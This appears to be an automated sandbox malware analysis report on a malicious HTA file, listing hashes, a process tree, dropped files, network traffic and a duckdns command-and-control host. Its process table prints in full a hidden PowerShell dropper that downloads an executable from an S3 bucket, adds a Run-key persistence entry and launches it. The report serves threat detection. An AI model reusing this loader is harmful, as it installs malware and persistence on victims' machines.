download: | MSHTAPayloadawalobina.hta |
Full analysis: | https://app.any.run/tasks/3ded9aa6-72fb-42bb-9dcb-6313dc3359fa |
Verdict: | Malicious activity |
Analysis date: | January 10, 2019, 19:41:59 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | text/html |
File info: | HTML document, ASCII text, with very long lines, with CRLF line terminators |
MD5: | 966AB78B142D9AAED55E86E26AD73887 |
SHA1: | 4453F3838CE737F8E7B62545A1A970F21C4A397E |
SHA256: | 3486A83F7060F11655B744238DE048E7D9F6E9F41E73FC0635CEF356DB12BE31 |
SSDEEP: | 96:wBvaY1zUMd6VfRjF/Vaqk8k236yOXOuJWksRRzMo:wb1zUrbfaIk+pU6xRRzP |
.html | | | HyperText Markup Language (100) |
---|
ContentType: | text/html; charset=utf-8 |
---|
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3000 | "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\admin\AppData\Local\Temp\MSHTAPayloadawalobina.hta.html | C:\Program Files\Internet Explorer\iexplore.exe | explorer.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Internet Explorer Exit code: 1 Version: 8.00.7600.16385 (win7_rtm.090713-1255) | ||||
3440 | "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:3000 CREDAT:79873 | C:\Program Files\Internet Explorer\iexplore.exe | — | iexplore.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Internet Explorer Exit code: 0 Version: 8.00.7600.16385 (win7_rtm.090713-1255) | ||||
3716 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -WindowStyle hidden -nologo $osCheckMajor = [System.Environment]::OSVersion.Version | Select -Expand Major;$osCheckMinor = [System.Environment]::OSVersion.Version | Select -Expand Minor;$osVersion = "$osCheckMajor" + '.' + "$osCheckMinor";$poshVersion = $PSVersionTable.PSVersion.Major;if($poshVersion -eq 2){$randomInt = Get-Random -Minimum 5 -Maximum 10;$randomStr = -join ((65..90) + (97..122) | Get-Random -Count $randomInt | % {[char]$_});$peName = $randomStr + '.exe';$savePath = "$env:APPDATA" + '\' + "$peName";$decoyName = "$randomStr" + '.jpg';$decoyURL = 'https://s3-ap-southeast-1.amazonaws.com/bnmmj/guru.jpg';$decoyPath = "$env:APPDATA" + '\' + "$decoyName";$webClient = New-Object System.Net.WebClient;$webDownload = $webClient.DownloadFile($decoyURL, $decoyPath);Start-Process $decoyPath;Start-Sleep -s 7;New-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\RUN" -Name $randomStr -Value $savePath -Force;;$peDirectURL = 'https://s3-ap-southeast-1.amazonaws.com/bnmmj/awaobinna.exe';$webClient = New-Object System.Net.WebClient;$webDownload = $webClient.DownloadFile($peDirectURL, $savePath)}elseif($poshVersion -ge 3){$randomInt = Get-Random -Minimum 5 -Maximum 10;$randomStr = -join ((65..90) + (97..122) | Get-Random -Count $randomInt | % {[char]$_});$peName = $randomStr + '.exe';$savePath = "$env:APPDATA" + '\' + "$peName";$decoyName = "$randomStr" + '.jpg';$decoyURL = 'https://s3-ap-southeast-1.amazonaws.com/bnmmj/guru.jpg';$decoyPath = "$env:APPDATA" + '\' + "$decoyName";Invoke-WebRequest -Uri $decoyURL -OutFile $decoyPath;Start-Process $decoyPath;Start-Sleep -s 7;New-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\RUN" -Name $randomStr -Value $savePath -Force;;$peDirectURL = 'https://s3-ap-southeast-1.amazonaws.com/bnmmj/awaobinna.exe';Invoke-WebRequest -Uri $peDirectURL -OutFile $savePath};Start-Process $savePath;attrib +h +s $savePath;"" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | iexplore.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2984 | C:\Windows\system32\DllHost.exe /Processid:{76D0CB12-7604-4048-B83C-1005C7DDC503} | C:\Windows\system32\DllHost.exe | — | svchost.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: COM Surrogate Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2632 | "C:\Users\admin\AppData\Roaming\WfFyPbj.exe" | C:\Users\admin\AppData\Roaming\WfFyPbj.exe | powershell.exe | |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
3132 | "C:\Windows\system32\attrib.exe" +h +s C:\Users\admin\AppData\Roaming\WfFyPbj.exe | C:\Windows\system32\attrib.exe | — | powershell.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Attribute Utility Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3768 | "C:\Users\admin\AppData\Local\Temp\88465914\lwh.exe" fld=ktl | C:\Users\admin\AppData\Local\Temp\88465914\lwh.exe | — | WfFyPbj.exe |
User: admin Company: AutoIt Team Integrity Level: MEDIUM Description: AutoIt v3 Script Exit code: 0 Version: 3, 3, 14, 5 | ||||
2736 | C:\Users\admin\AppData\Local\Temp\88465914\lwh.exe C:\Users\admin\AppData\Local\Temp\88465914\VTOCI | C:\Users\admin\AppData\Local\Temp\88465914\lwh.exe | lwh.exe | |
User: admin Company: AutoIt Team Integrity Level: MEDIUM Description: AutoIt v3 Script Exit code: 0 Version: 3, 3, 14, 5 | ||||
1144 | "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | lwh.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft .NET Services Installation Utility Version: 4.6.1055.0 built by: NETFXREL2 |
PID | Process | Filename | Type | |
---|---|---|---|---|
3000 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\RB73MZ6Y\favicon[1].ico | — | |
MD5:— | SHA256:— | |||
3000 | iexplore.exe | C:\Users\admin\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico | — | |
MD5:— | SHA256:— | |||
3716 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\84U14WF1C1GOHJU9ZFQS.temp | — | |
MD5:— | SHA256:— | |||
2632 | WfFyPbj.exe | C:\Users\admin\AppData\Local\Temp\88465914\ibw.mp4 | text | |
MD5:7CBA224E33403861F74573F8464D3D2F | SHA256:AD912169922C0F25F333CF4235429B63C567E349080A4CB6C78F2F49F8279F7E | |||
3716 | powershell.exe | C:\Users\admin\AppData\Roaming\WfFyPbj.jpg | image | |
MD5:38C3261D8E98A3BBBCFAFF8C259A9DDE | SHA256:98F6E62ABC7A08FF41584696CF46DA99C86C3EEF95D1CF3BF6262054E71E4E74 | |||
2632 | WfFyPbj.exe | C:\Users\admin\AppData\Local\Temp\88465914\idn.docx | text | |
MD5:B0341DF38A4783109002AB4CF33C9D55 | SHA256:C2073FFEBE269E494A467760438C9F2A34C109584965555E4A5FFE2FEBEB4858 | |||
3440 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012019011020190111\index.dat | dat | |
MD5:CBA4D69DFFAFA00DB6B321A46491D5EF | SHA256:AC378E39A16B3E8A1B83485D3563C690EF744D9C2B3428FD3D187BF15E561A97 | |||
2632 | WfFyPbj.exe | C:\Users\admin\AppData\Local\Temp\88465914\jxn.txt | text | |
MD5:11D8800A15EBDB99487EDEBC06EF86E8 | SHA256:7E63EF6F2A78B51AD2915D0CA50D0B0D0420600BA8F4A99EE6CDAE3AC7868A99 | |||
2632 | WfFyPbj.exe | C:\Users\admin\AppData\Local\Temp\88465914\emu.mp3 | text | |
MD5:5709F32A91FE4FD8DB720BCABD3546D1 | SHA256:C9992EB858B214114AEF5F2BDFAE725920E4550A4B8E77301144D9363E3F9760 | |||
2632 | WfFyPbj.exe | C:\Users\admin\AppData\Local\Temp\88465914\dwa.icm | text | |
MD5:3A5452C2AF12FB5F972F8FF46C91888C | SHA256:CB857B22E73625770E18EC4029DA260E7F99F4738E847B16B5EAA56D294F687B |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3000 | iexplore.exe | GET | 200 | 13.107.21.200:80 | http://www.bing.com/favicon.ico | US | image | 237 b | whitelisted |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3000 | iexplore.exe | 13.107.21.200:80 | www.bing.com | Microsoft Corporation | US | whitelisted |
3716 | powershell.exe | 52.219.32.73:443 | s3-ap-southeast-1.amazonaws.com | Amazon.com, Inc. | SG | unknown |
1144 | RegSvcs.exe | 45.249.90.124:1609 | idea1com2002.duckdns.org | Korea Telecom | KR | malicious |
Domain | IP | Reputation |
---|---|---|
www.bing.com |
| whitelisted |
s3-ap-southeast-1.amazonaws.com |
| shared |
idea1com2002.duckdns.org |
| malicious |
dns.msftncsi.com |
| shared |
PID | Process | Class | Message |
---|---|---|---|
— | — | Misc activity | ET INFO DYNAMIC_DNS Query to *.duckdns. Domain |
— | — | Misc activity | ET INFO DYNAMIC_DNS Query to *.duckdns. Domain |
— | — | Misc activity | ET INFO DYNAMIC_DNS Query to *.duckdns. Domain |
— | — | Misc activity | ET INFO DYNAMIC_DNS Query to *.duckdns. Domain |